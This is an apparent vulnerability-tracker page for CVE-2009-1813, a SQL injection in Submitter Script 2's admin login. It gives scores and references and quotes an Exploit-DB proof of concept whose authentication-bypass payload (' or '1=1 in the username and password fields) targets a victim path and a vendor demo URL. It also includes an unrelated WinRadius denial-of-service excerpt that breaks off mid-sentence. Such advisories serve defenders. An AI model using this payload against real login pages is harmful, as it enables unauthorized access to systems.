CVE-2009-1813
published 2009-05-29CVE-2009-1813: Multiple SQL injection vulnerabilities in admin/index.php in Submitter Script 2 allow remote attackers to execute arbitrary SQL commands via (1) the uNev…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.31%
81.3th percentile
Multiple SQL injection vulnerabilities in admin/index.php in Submitter Script 2 allow remote attackers to execute arbitrary SQL commands via (1) the uNev parameter (aka the username field) or (2) the uJelszo parameter (aka the Password field).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| submitterscript | submitterscript | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WinRadius Server 2009 - Denial of Service
exploitdb·2012-05-29
CVE-2012-3816 WinRadius Server 2009 - Denial of Service
WinRadius Server 2009 - Denial of Service
---
Title: WinRadius Server Denial Of Service Vulnerability
Software : WinRadius
Software Version : v2009
Vendor: http://www.elite-school.com/saas/WinRadius/
Vulnerability Published : 2012-05-27
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)
Bug Description :
WinRadius is a standard RADIUS server for network authentication, accounting. It's easy to use, and can be used for telecommunication accounting platform, PPP authentication, accounting server. It support PPP, PPPoE, PPTP, VPN, VoIP, ADSL, Cable Modem, CDMA, GSM, GPRS, WLAN(802.1x), etc.
WinRadius server would bind udp port 1812 and 1813, but it does not validate the password option size leading to a Denial Of Service flaw while send
Exploit-DB
Submitter Script - Authentication Bypass
exploitdb·2009-05-14
CVE-2009-1813 Submitter Script - Authentication Bypass
Submitter Script - Authentication Bypass
---
Submitter Script 2(Auth Bypass) SQL Injection Vulnerability
Founder : ThE g0bL!N
Vendor:http://submitterscript.com/
More info:http://submitterscript.com/products.php
Auth Bypass
http://victim/[path]/admin/
username:' or '1=1
Password:' or '1=1
Dem0
----
http://demo.submitterscript.com/admin/
Greeting To ALL My Friends (Dz)
# milw0rm.com [2009-05-14]
No writeups or analysis indexed.
http://osvdb.org/54475http://secunia.com/advisories/35088http://www.securityfocus.com/bid/34970http://www.vupen.com/english/advisories/2009/1327https://exchange.xforce.ibmcloud.com/vulnerabilities/50552https://www.exploit-db.com/exploits/8683http://osvdb.org/54475http://secunia.com/advisories/35088http://www.securityfocus.com/bid/34970http://www.vupen.com/english/advisories/2009/1327https://exchange.xforce.ibmcloud.com/vulnerabilities/50552https://www.exploit-db.com/exploits/8683
2009-05-29
Published